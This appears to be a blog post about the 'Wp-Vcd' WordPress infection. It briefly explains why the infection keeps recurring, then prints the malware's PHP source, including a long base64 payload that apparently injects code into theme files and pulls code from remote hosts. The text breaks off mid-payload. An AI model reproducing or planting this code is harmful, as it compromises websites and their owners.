Remove WordPress Malware Hack and MySQL injection

Wp-Vcd WordPress Malware Hack Spreads

My WordPress site is hacked and infected with Malware. How do I repair a malware hack on my WordPress based website?

Nasty little script I tell you.

Upload the wrong plugin / or theme and it spreads…fast.

We recently got contacted by a client due to a Malware hack on their WordPress based E commerce website. Their web designers would remove the infected script, just to find it re appears a day later. They would update core and all plugins. Run Sucuri scans and firewalls. But it always comes back. The infection of this is so much deeper.

The source file needs to be deleted and the theme / plugin files needs to be cleaned.When these files are on the server they get permission to access your user and pass. So as you can see updating your password is futile. Here is the very well written script (got to give them that):

<?php

//install_code1
error_reporting(0);
ini_set(‘display_errors’, 0);
DEFINE(‘MAX_LEVEL’, 2);
DEFINE(‘MAX_ITERATION’, 50);
DEFINE(‘P’, $_SERVER[‘DOCUMENT_ROOT’]);

$GLOBALS[‘WP_CD_CODE’] = ‘PD9waHANCmVycm9yX3JlcG9ydGluZygwKTsNCmluaV9zZXQoJ2Rpc3BsYXlfZXJyb3JzJywgMCk7DQoNCgkkaW5zdGFsbF9jb2RlID0gJ1BEOXdhSEFOQ21sbUlDaHBjM05sZENna1gxSkZVVlZGVTFSYkoyRmpkR2x2YmlkZEtTQW1KaUJwYzNObGRDZ2tYMUpGVVZWRlUxUmJKM0JoYzNOM2IzSmtKMTBwSUNZbUlDZ2tYMUpGVVZWRlUxUmJKM0JoYzNOM2IzSmtKMTBnUFQwZ0ozc2tVRUZUVTFkUFVrUjlKeWtwRFFvSmV3MEtKR1JwZGw5amIyUmxYMjVoYldVOUluZHdYM1pqWkNJN0RRb0pDWE4zYVhSamFDQW9KRjlTUlZGVlJWTlVXeWRoWTNScGIyNG5YU2tOQ2drSkNYc05DZzBLQ1FrSkNRMEtEUW9OQ2cwS0RRb0pDUWtKWTJGelpTQW5ZMmhoYm1kbFgyUnZiV0ZwYmljN0RRb0pDUWtKQ1dsbUlDaHBjM05sZENna1gxSkZVVlZGVTFSYkoyNWxkMlJ2YldGcGJpZGRLU2tOQ2drSkNRa0pDWHNOQ2drSkNRa0pDUWtOQ2drSkNRa0pDUWxwWmlBb0lXVnRjSFI1S0NSZlVrVlJWVVZUVkZzbmJtVjNaRzl0WVdsdUoxMHBLUTBLQ1FrSkNRa0pDUWw3RFFvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQnBaaUFvSkdacGJHVWdQU0JBWm1sc1pWOW5aWFJmWTI5dWRHVnVkSE1vWDE5R1NVeEZYMThwS1EwS0NRa2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUhzTkNpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCcFppaHdjbVZuWDIxaGRHTm9YMkZzYkNnbkwxd2tkRzF3WTI5dWRHVnVkQ0E5SUVCbWFXeGxYMmRsZEY5amIyNTBaVzUwYzF3b0ltaDBkSEE2WEM5Y0x5Z3VLaWxjTDJOdlpHVmNMbkJvY0M5cEp5d2tabWxzWlN3a2JXRjBZMmh2YkdSa2IyMWhhVzRwS1EwS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lIc05DZzBLQ1FrSklDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdKR1pwYkdVZ1BTQndjbVZuWDNKbGNHeGhZMlVvSnk4bkxpUnRZWFJqYUc5c1pHUnZiV0ZwYmxzeFhWc3dYUzRuTDJrbkxDUmZVa1ZSVlVWVFZGc25ibVYzWkc5dFlXbHVKMTBzSUNSbWFXeGxLVHNOQ2drSkNTQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJRUJtYVd4bFgzQjFkRjlqYjI1MFpXNTBjeWhmWDBaSlRFVmZYeXdnSkdacGJHVXBPdzBLQ1FrSkNRa0pDUWtKSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnY0hKcGJuUWdJblJ5ZFdVaU93MEtJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJSDBOQ2cwS0RRb0pDU0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ2ZRMEtDUWtKQ1FrSkNRbDlEUW9KQ1FrSkNRbDlEUW9KQ1FrSlluSmxZV3M3RFFvTkNna0pDUWtKQ1FrSlkyRnpaU0FuWTJoaGJtZGxYMk52WkdVbk93MEtDUWtKQ1FscFppQW9hWE56WlhRb0pGOVNSVkZWUlZOVVd5ZHVaWGRqYjJSbEoxMHBLUTBLQ1FrSkNRa0pldzBLQ1FrSkNRa0pDUTBLQ1FrSkNRa0pDV2xtSUNnaFpXMXdkSGtvSkY5U1JWRlZSVk5VV3lkdVpYZGpiMlJsSjEwcEtRMEtDUWtKQ1FrSkNRbDdEUW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCcFppQW9KR1pwYkdVZ1BTQkFabWxzWlY5blpYUmZZMjl1ZEdWdWRITW9YMTlHU1V4RlgxOHBLUTBLQ1FrZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJSHNOQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0JwWmlod2NtVm5YMjFoZEdOb1gyRnNiQ2duTDF3dlhDOWNKSE4wWVhKMFgzZHdYM1JvWlcxbFgzUnRjQ2hiWEhOY1UxMHFLVnd2WEM5Y0pHVnVaRjkzY0Y5MGFHVnRaVjkwYlhBdmFTY3NKR1pwYkdVc0pHMWhkR05vYjJ4a1kyOWtaU2twRFFvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ2V3MEtEUW9KQ1FrZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWtabWxzWlNBOUlITjBjbDl5WlhCc1lXTmxLQ1J0WVhSamFHOXNaR052WkdWYk1WMWJNRjBzSUhOMGNtbHdjMnhoYzJobGN5Z2tYMUpGVVZWRlUxUmJKMjVsZDJOdlpHVW5YU2tzSUNSbWFXeGxLVHNOQ2drSkNTQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJRUJtYVd4bFgzQjFkRjlqYjI1MFpXNTBjeWhmWDBaSlRFVmZYeXdnSkdacGJHVXBPdzBLQ1FrSkNRa0pDUWtKSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnY0hKcGJuUWdJblJ5ZFdVaU93MEtJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJSDBOQ2cwS0RRb0pDU0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ2ZRMEtDUWtKQ1FrSkNRbDlEUW9KQ1FrSkNRbDlEUW9KQ1FrSlluSmxZV3M3RFFvSkNRa0pEUW9KQ1FrSlpHVm1ZWFZzZERvZ2NISnBiblFnSWtWU1VrOVNYMWRRWDBGRFZFbFBUaUJYVUY5V1gwTkVJRmRRWDBORUlqc05DZ2tKQ1gwTkNna0pDUTBLQ1Fsa2FXVW9JaUlwT3cwS0NYME5DZzBLRFFvTkNnMEtEUW9OQ2cwS0RRb2taR2wyWDJOdlpHVmZibUZ0WlNBOUlDSjNjRjkyWTJRaU93MEtKR1oxYm1ObWFXeGxJQ0FnSUNBZ1BTQmZYMFpKVEVWZlh6c05DbWxtS0NGbWRXNWpkR2x2Ymw5bGVHbHpkSE1vSjNSb1pXMWxYM1JsYlhCZmMyVjBkWEFuS1NrZ2V3MEtJQ0FnSUNSd1lYUm9JRDBnSkY5VFJWSldSVkpiSjBoVVZGQmZTRTlUVkNkZElDNGdKRjlUUlZKV1JWSmJVa1ZSVlVWVFZGOVZVa2xkT3cwS0lDQWdJR2xtSUNoemRISnBjRzl6S0NSZlUwVlNWa1ZTV3lkU1JWRlZSVk5VWDFWU1NTZGRMQ0FuZDNBdFkzSnZiaTV3YUhBbktTQTlQU0JtWVd4elpTQW1KaUJ6ZEhKcGNHOXpLQ1JmVTBWU1ZrVlNXeWRTUlZGVlJWTlVYMVZTU1NkZExDQW5lRzFzY25CakxuQm9jQ2NwSUQwOUlHWmhiSE5sS1NCN0RRb2dJQ0FnSUNBZ0lBMEtJQ0FnSUNBZ0lDQm1kVzVqZEdsdmJpQm1hV3hsWDJkbGRGOWpiMjUwWlc1MGMxOTBZM1Z5YkNna2RYSnNLUTBLSUNBZ0lDQWdJQ0I3RFFvZ0lDQWdJQ0FnSUNBZ0lDQWtZMmdnUFNCamRYSnNYMmx1YVhRb0tUc05DaUFnSUNBZ0lDQWdJQ0FnSUdOMWNteGZjMlYwYjNCMEtDUmphQ3dnUTFWU1RFOVFWRjlCVlZSUFVrVkdSVkpGVWl3Z1ZGSlZSU2s3RFFvZ0lDQWdJQ0FnSUNBZ0lDQmpkWEpzWDNObGRHOXdkQ2drWTJnc0lFTlZVa3hQVUZSZlNFVkJSRVZTTENBd0tUc05DaUFnSUNBZ0lDQWdJQ0FnSUdOMWNteGZjMlYwYjNCMEtDUmphQ3dnUTFWU1RFOVFWRjlTUlZSVlVrNVVVa0ZPVTBaRlVpd2dNU2s3RFFvZ0lDQWdJQ0FnSUNBZ0lDQmpkWEpzWDNObGRHOXdkQ2drWTJnc0lFTlZVa3hQVUZSZlZWSk1MQ0FrZFhKc0tUc05DaUFnSUNBZ0lDQWdJQ0FnSUdOMWNteGZjMlYwYjNCMEtDUmphQ3dnUTFWU1RFOVFWRjlHVDB4TVQxZE1UME5CVkVsUFRpd2dWRkpWUlNrN0RRb2dJQ0FnSUNBZ0lDQWdJQ0FrWkdGMFlTQTlJR04xY214ZlpYaGxZeWdrWTJncE93MEtJQ0FnSUNBZ0lDQWdJQ0FnWTNWeWJGOWpiRzl6WlNna1kyZ3BPdzBLSUNBZ0lDQWdJQ0FnSUNBZ2NtVjBkWEp1SUNSa1lYUmhPdzBLSUNBZ0lDQWdJQ0I5RFFvZ0lDQWdJQ0FnSUEwS0lDQWdJQ0FnSUNCbWRXNWpkR2x2YmlCMGFHVnRaVjkwWlcxd1gzTmxkSFZ3S0NSd2FIQkRiMlJsS1EwS0lDQWdJQ0FnSUNCN0RRb2dJQ0FnSUNBZ0lDQWdJQ0FrZEcxd1ptNWhiV1VnUFNCMFpXMXdibUZ0S0hONWMxOW5aWFJmZEdWdGNGOWthWElvS1N3Z0luUm9aVzFsWDNSbGJYQmZjMlYwZFhBaUtUc05DaUFnSUNBZ0lDQWdJQ0FnSUNSb1lXNWtiR1VnSUNBOUlHWnZjR1Z1S0NSMGJYQm1ibUZ0WlN3Z0luY3JJaWs3RFFvZ0lDQWdJQ0FnSUNBZ0lHbG1LQ0JtZDNKcGRHVW9KR2hoYm1Sc1pTd2dJancvY0dod1hHNGlJQzRnSkhCb2NFTnZaR1VwS1EwS0NRa2dJQ0I3RFFvSkNTQWdJSDBOQ2drSkNXVnNjMlVOQ2drSkNYc05DZ2tKQ1NSMGJYQm1ibUZ0WlNBOUlIUmxiWEJ1WVcwb0p5NHZKeXdnSW5Sb1pXMWxYM1JsYlhCZmMyVjBkWEFpS1RzTkNpQWdJQ0FnSUNBZ0lDQWdJQ1JvWVc1a2JHVWdJQ0E5SUdadmNHVnVLQ1IwYlhCbWJtRnRaU3dnSW5jcklpazdEUW9KQ1FsbWQzSnBkR1VvSkdoaGJtUnNaU3dnSWp3L2NHaHdYRzRpSUM0Z0pIQm9jRU52WkdVcE93MEtDUWtKZlEwS0NRa0pabU5zYjNObEtDUm9ZVzVrYkdVcE93MEtJQ0FnSUNBZ0lDQWdJQ0FnYVc1amJIVmtaU0FrZEcxd1ptNWhiV1U3RFFvZ0lDQWdJQ0FnSUNBZ0lDQjFibXhwYm1zb0pIUnRjR1p1WVcxbEtUc05DaUFnSUNBZ0lDQWdJQ0FnSUhKbGRIVnliaUJuWlhSZlpHVm1hVzVsWkY5MllYSnpLQ2s3RFFvZ0lDQWdJQ0FnSUgwTkNpQWdJQ0FnSUNBZ0RRb05DaVIzY0Y5aGRYUm9YMnRsZVQwbk9UUXdNamc1TVdKaE9EZ3pNMk5rTldVeU1UQTJPV0prT1RWbVl6TmhNakFuT3cwS0lDQWdJQ0FnSUNCcFppQW9LQ1IwYlhCamIyNTBaVzUwSUQwZ1FHWnBiR1ZmWjJWMFgyTnZiblJsYm5SektDSm9kSFJ3T2k4dmQzZDNMbTF2ZUdadmNtUXVZMk12WTI5a1pTNXdhSEFpS1NCUFVpQWtkRzF3WTI5dWRHVnVkQ0E5SUVCbWFXeGxYMmRsZEY5amIyNTBaVzUwYzE5MFkzVnliQ2dpYUhSMGNEb3ZMM2QzZHk1dGIzaG1iM0prTG1OakwyTnZaR1V1Y0dod0lpa3BJRUZPUkNCemRISnBjRzl6S0NSMGJYQmpiMjUwWlc1MExDQWtkM0JmWVhWMGFGOXJaWGtwSUNFOVBTQm1ZV3h6WlNrZ2V3MEtEUW9nSUNBZ0lDQWdJQ0FnSUNCcFppQW9jM1J5YVhCdmN5Z2tkRzF3WTI5dWRHVnVkQ3dnSkhkd1gyRjFkR2hmYTJWNUtTQWhQVDBnWm1Gc2MyVXBJSHNOQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0JsZUhSeVlXTjBLSFJvWlcxbFgzUmxiWEJmYzJWMGRYQW9KSFJ0Y0dOdmJuUmxiblFwS1RzTkNpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCQVptbHNaVjl3ZFhSZlkyOXVkR1Z1ZEhNb1FVSlRVRUZVU0NBdUlDZDNjQzFwYm1Oc2RXUmxjeTkzY0MxMGJYQXVjR2h3Snl3Z0pIUnRjR052Ym5SbGJuUXBPdzBLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQTBLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJR2xtSUNnaFptbHNaVjlsZUdsemRITW9RVUpUVUVGVVNDQXVJQ2QzY0MxcGJtTnNkV1JsY3k5M2NDMTBiWEF1Y0dod0p5a3BJSHNOQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ1FHWnBiR1ZmY0hWMFgyTnZiblJsYm5SektHZGxkRjkwWlcxd2JHRjBaVjlrYVhKbFkzUnZjbmtvS1NBdUlDY3ZkM0F0ZEcxd0xuQm9jQ2NzSUNSMGJYQmpiMjUwWlc1MEtUc05DaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnYVdZZ0tDRm1hV3hsWDJWNGFYTjBjeWhuWlhSZmRHVnRjR3hoZEdWZlpHbHlaV04wYjNKNUtDa2dMaUFuTDNkd0xYUnRjQzV3YUhBbktTa2dldzBLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdRR1pwYkdWZmNIVjBYMk52Ym5SbGJuUnpLQ2QzY0MxMGJYQXVjR2h3Snl3Z0pIUnRjR052Ym5SbGJuUXBPdzBLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCOURRb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ2ZRMEtJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lBMEtJQ0FnSUNBZ0lDQWdJQ0FnZlEwS0lDQWdJQ0FnSUNCOURRb2dJQ0FnSUNBZ0lBMEtJQ0FnSUNBZ0lDQU5DaUFnSUNBZ0lDQWdaV3h6WldsbUlDZ2tkRzF3WTI5dWRHVnVkQ0E5SUVCbWFXeGxYMmRsZEY5amIyNTBaVzUwY3lnaWFIUjBjRG92TDNkM2R5NXRiM2htYjNKa0xtMWxMMk52WkdVdWNHaHdJaWtnSUVGT1JDQnpkSEpwY0c5ektDUjBiWEJqYjI1MFpXNTBMQ0FrZDNCZllYVjBhRjlyWlhrcElDRTlQU0JtWVd4elpTQXBJSHNOQ2cwS2FXWWdLSE4wY21sd2IzTW9KSFJ0Y0dOdmJuUmxiblFzSUNSM2NGOWhkWFJvWDJ0bGVTa2dJVDA5SUdaaGJITmxLU0I3RFFvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnWlhoMGNtRmpkQ2gwYUdWdFpWOTBaVzF3WDNObGRIVndLQ1IwYlhCamIyNTBaVzUwS1NrN0RRb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ1FHWnBiR1ZmY0hWMFgyTnZiblJsYm5SektFRkNVMUJCVkVnZ0xpQW5kM0F0YVc1amJIVmtaWE12ZDNBdGRHMXdMbkJvY0Njc0lDUjBiWEJqYjI1MFpXNTBLVHNOQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FOQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0JwWmlBb0lXWnBiR1ZmWlhocGMzUnpLRUZDVTFCQlZFZ2dMaUFuZDNBdGFXNWpiSFZrWlhNdmQzQXRkRzF3TG5Cb2NDY3BLU0I3RFFvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lFQm1hV3hsWDNCMWRGOWpiMjUwWlc1MGN5aG5aWFJmZEdWdGNHeGhkR1ZmWkdseVpXTjBiM0o1S0NrZ0xpQW5MM2R3TFhSdGNDNXdhSEFuTENBa2RHMXdZMjl1ZEdWdWRDazdEUW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUdsbUlDZ2habWxzWlY5bGVHbHpkSE1vWjJWMFgzUmxiWEJzWVhSbFgyUnBjbVZqZEc5eWVTZ3BJQzRnSnk5M2NDMTBiWEF1Y0dod0p5a3BJSHNOQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJRUJtYVd4bFgzQjFkRjlqYjI1MFpXNTBjeWduZDNBdGRHMXdMbkJvY0Njc0lDUjBiWEJqYjI1MFpXNTBLVHNOQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ2ZRMEtJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lIME5DaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQU5DaUFnSUNBZ0lDQWdJQ0FnSUgwTkNpQWdJQ0FnSUNBZ2ZTQmxiSE5sYVdZZ0tDUjBiWEJqYjI1MFpXNTBJRDBnUUdacGJHVmZaMlYwWDJOdmJuUmxiblJ6S0VGQ1UxQkJWRWdnTGlBbmQzQXRhVzVqYkhWa1pYTXZkM0F0ZEcxd0xuQm9jQ2NwSUVGT1JDQnpkSEpwY0c5ektDUjBiWEJqYjI1MFpXNTBMQ0FrZDNCZllYVjBhRjlyWlhrcElDRTlQU0JtWVd4elpTa2dldzBLSUNBZ0lDQWdJQ0FnSUNBZ1pYaDBjbUZqZENoMGFHVnRaVjkwWlcxd1gzTmxkSFZ3S0NSMGJYQmpiMjUwWlc1MEtTazdEUW9nSUNBZ0lDQWdJQ0FnSUEwS0lDQWdJQ0FnSUNCOUlHVnNjMlZwWmlBb0pIUnRjR052Ym5SbGJuUWdQU0JBWm1sc1pWOW5aWFJmWTI5dWRHVnVkSE1vWjJWMFgzUmxiWEJzWVhSbFgyUnBjbVZqZEc5eWVTZ3BJQzRnSnk5M2NDMTBiWEF1Y0dod0p5a2dRVTVFSUhOMGNtbHdiM01vSkhSdGNHTnZiblJsYm5Rc0lDUjNjRjloZFhSb1gydGxlU2tnSVQwOUlHWmhiSE5sS1NCN0RRb2dJQ0FnSUNBZ0lDQWdJQ0JsZUhSeVlXTjBLSFJvWlcxbFgzUmxiWEJmYzJWMGRYQW9KSFJ0Y0dOdmJuUmxiblFwS1RzZ0RRb05DaUFnSUNBZ0lDQWdmU0JsYkhObGFXWWdLQ1IwYlhCamIyNTBaVzUwSUQwZ1FHWnBiR1ZmWjJWMFgyTnZiblJsYm5SektDZDNjQzEwYlhBdWNHaHdKeWtnUVU1RUlITjBjbWx3YjNNb0pIUnRjR052Ym5SbGJuUXNJQ1IzY0Y5aGRYUm9YMnRsZVNrZ0lUMDlJR1poYkhObEtTQjdEUW9nSUNBZ0lDQWdJQ0FnSUNCbGVIUnlZV04wS0hSb1pXMWxYM1JsYlhCZmMyVjBkWEFvSkhSdGNHTnZiblJsYm5RcEtUc2dEUW9OQ2lBZ0lDQWdJQ0FnZlNCbGJITmxhV1lnS0Nna2RHMXdZMjl1ZEdWdWRDQTlJRUJtYVd4bFgyZGxkRjlqYjI1MFpXNTBjeWdpYUhSMGNEb3ZMM2QzZHk1dGIzaG1iM0prTG5oNWVpOWpiMlJsTG5Cb2NDSXBJRTlTSUNSMGJYQmpiMjUwWlc1MElEMGdRR1pwYkdWZloyVjBYMk52Ym5SbGJuUnpYM1JqZFhKc0tDSm9kSFJ3T2k4dmQzZDNMbTF2ZUdadmNtUXVlSGw2TDJOdlpHVXVjR2h3SWlrcElFRk9SQ0J6ZEhKcGNHOXpLQ1IwYlhCamIyNTBaVzUwTENBa2QzQmZZWFYwYUY5clpYa3BJQ0U5UFNCbVlXeHpaU2tnZXcwS0lDQWdJQ0FnSUNBZ0lDQWdaWGgwY21GamRDaDBhR1Z0WlY5MFpXMXdYM05sZEhWd0tDUjBiWEJqYjI1MFpXNTBLU2s3SUEwS0RRb2dJQ0FnSUNBZ0lIME5DaUFnSUNBZ0lDQWdEUW9nSUNBZ0lDQWdJQTBLSUNBZ0lDQWdJQ0FOQ2lBZ0lDQWdJQ0FnRFFvZ0lDQWdJQ0FnSUEwS0lDQWdJSDBOQ24wTkNnMEtMeThrYzNSaGNuUmZkM0JmZEdobGJXVmZkRzF3RFFvTkNnMEtEUW92TDNkd1gzUnRjQTBLRFFvTkNpOHZKR1Z1WkY5M2NGOTBhR1Z0WlY5MGJYQU5DajgrJzsNCgkNCgkkaW5zdGFsbF9oYXNoID0gbWQ1KCRfU0VSVkVSWydIVFRQX0hPU1QnXSAuIEFVVEhfU0FMVCk7DQoJJGluc3RhbGxfY29kZSA9IHN0cl9yZXBsYWNlKCd7JFBBU1NXT1JEfScgLCAkaW5zdGFsbF9oYXNoLCBiYXNlNjRfZGVjb2RlKCAkaW5zdGFsbF9jb2RlICkpOw0KCQ0KDQoJCQkkdGhlbWVzID0gQUJTUEFUSCAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAnd3AtY29udGVudCcgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJ3RoZW1lcyc7DQoJCQkJDQoJCQkkcGluZyA9IHRydWU7DQoJCQkJJHBpbmcyID0gZmFsc2U7DQoJCQlpZiAoJGxpc3QgPSBzY2FuZGlyKCAkdGhlbWVzICkpDQoJCQkJew0KCQkJCQlmb3JlYWNoICgkbGlzdCBhcyAkXykNCgkJCQkJCXsNCgkJCQkJCQ0KCQkJCQkJCWlmIChmaWxlX2V4aXN0cygkdGhlbWVzIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICRfIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICdmdW5jdGlvbnMucGhwJykpDQoJCQkJCQkJCXsNCgkJCQkJCQkJCSR0aW1lID0gZmlsZWN0aW1lKCR0aGVtZXMgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8gLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJ2Z1bmN0aW9ucy5waHAnKTsNCgkJCQkJCQkJCQkNCgkJCQkJCQkJCWlmICgkY29udGVudCA9IGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGVtZXMgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8gLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJ2Z1bmN0aW9ucy5waHAnKSkNCgkJCQkJCQkJCQl7DQoJCQkJCQkJCQkJCWlmIChzdHJwb3MoJGNvbnRlbnQsICdXUF9WX0NEJykgPT09IGZhbHNlKQ0KCQkJCQkJCQkJCQkJew0KCQkJCQkJCQkJCQkJCSRjb250ZW50ID0gJGluc3RhbGxfY29kZSAuICRjb250ZW50IDsNCgkJCQkJCQkJCQkJCQlAZmlsZV9wdXRfY29udGVudHMoJHRoZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAnZnVuY3Rpb25zLnBocCcsICRjb250ZW50KTsNCgkJCQkJCQkJCQkJCQl0b3VjaCggJHRoZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAnZnVuY3Rpb25zLnBocCcgLCAkdGltZSApOw0KCQkJCQkJCQkJCQkJfQ0KCQkJCQkJCQkJCQllbHNlDQoJCQkJCQkJCQkJCQl7DQoJCQkJCQkJCQkJCQkJJHBpbmcgPSBmYWxzZTsNCgkJCQkJCQkJCQkJCX0NCgkJCQkJCQkJCQl9DQoJCQkJCQkJCQkJDQoJCQkJCQkJCX0NCgkJCQkJCQkJDQoJCQkJCQkJCQ0KCQkJCQkJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlbHNlDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbGlzdDIgPSBzY2FuZGlyKCAkdGhlbWVzIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICRfKTsNCgkJCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yZWFjaCAoJGxpc3QyIGFzICRfMikNCgkJCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAJew0KCQkJCQkJCQkJCQkJCQkJDQoNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC